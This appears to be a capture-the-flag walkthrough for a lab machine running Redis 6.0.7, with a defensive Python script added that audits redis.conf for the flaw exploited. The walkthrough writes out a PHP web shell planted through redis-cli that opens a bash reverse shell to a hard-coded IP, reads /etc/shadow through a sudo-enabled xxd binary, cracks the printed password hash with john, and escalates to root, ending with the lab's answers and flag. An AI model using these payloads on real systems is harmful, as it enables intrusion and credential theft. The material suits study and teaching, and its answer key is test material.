1. Scan the machine, how many ports are open?
Ans: 2
2. What is the database management system installed on the server?
Ans: redis
3. What port is the database management system running on?
Ans: 6379
4. What is the version of the management system installed on the server?
Ans: 6.0.7
5. Compromise the machine and locate user.txt
Let's connect with redis-cli using the below syntax:
redis-cli -h <Machine-IP>
We found a username, vianka, so let's enumerate further.
1. Let's try to upload a reverse shell using the following commands inside redis-cli:
config set dir /var/www/html
config set dbfilename shell.php
set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.11.36.171/4444 0>&1'\"); ?>"
save
2. Now, let's start a netcat listener using the following command:
nc -lvp 4444
3. Then navigate to http://<Machine-IP>/shell.php
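What makes the write above possible is that a client with no credentials can change dir and dbfilename at runtime and then trigger a dump. As an added example (not part of the original write-up), here is a small Python audit of a redis.conf that flags exactly those settings, run against a constructed weak config and a constructed hardened one; the requirepass value is a placeholder.

```python
# Added audit script (not from the write-up): reads a redis.conf and reports the
# settings that let an unauthenticated client run CONFIG SET dir/dbfilename + SAVE.
# Both configs below are constructed; the requirepass value is a placeholder.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-LONG-RANDOM-SECRET
rename-command CONFIG ""
dir /var/lib/redis
"""


def parse_conf(text):
    """Map each directive to the list of values it was given (comments skipped)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf.setdefault(parts[0].lower(), []).append(parts[1] if len(parts) > 1 else "")
    return conf


def audit(text):
    """Return human-readable findings; an empty list means none of the checks fired."""
    conf = parse_conf(text)
    findings = []
    if "requirepass" not in conf:
        findings.append("no requirepass: anyone reaching the port can issue CONFIG SET")
    binds = conf.get("bind", [""])[-1].split()  # no bind line = all interfaces
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind exposes Redis on every interface")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode is off")
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("CONFIG still available: dir/dbfilename can be changed at runtime")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf) or ["no findings"])
```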
6. What is the local user account password?
1. On analysing GTFOBins we found a binary that can read files with sudo permissions, so let's first make our shell interactive with the python command:
$ python3 -c "import pty; pty.spawn('/bin/bash')"
2. Then we try to read the /etc/shadow file using the following commands:
$ LFILE=/etc/shadow
$ /usr/bin/xxd "$LFILE" | /usr/bin/xxd -r
root:!:18507:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18506:0:99999:7:::
uuidd:*:18506:0:99999:7:::
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::
3. Now copy and store the hash of vianka into a file named hash.txt on your system. (Make sure to check the hash if you paste it via the terminal.)
4. Now let's use john to crack the password using the below command:
$ john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
beautiful1 (vianka)
Session completed.
Ans: beautiful1
7. Escalate privileges and obtain root.txt
1. Now let's log in as vianka with her password beautiful1 using the command su vianka, and let's check what commands vianka can run.
2. She can run all commands, so let's sudo it:
sudo su
cat /root/root.txt
Ans: thm{xxd_pr1v_escalat1on}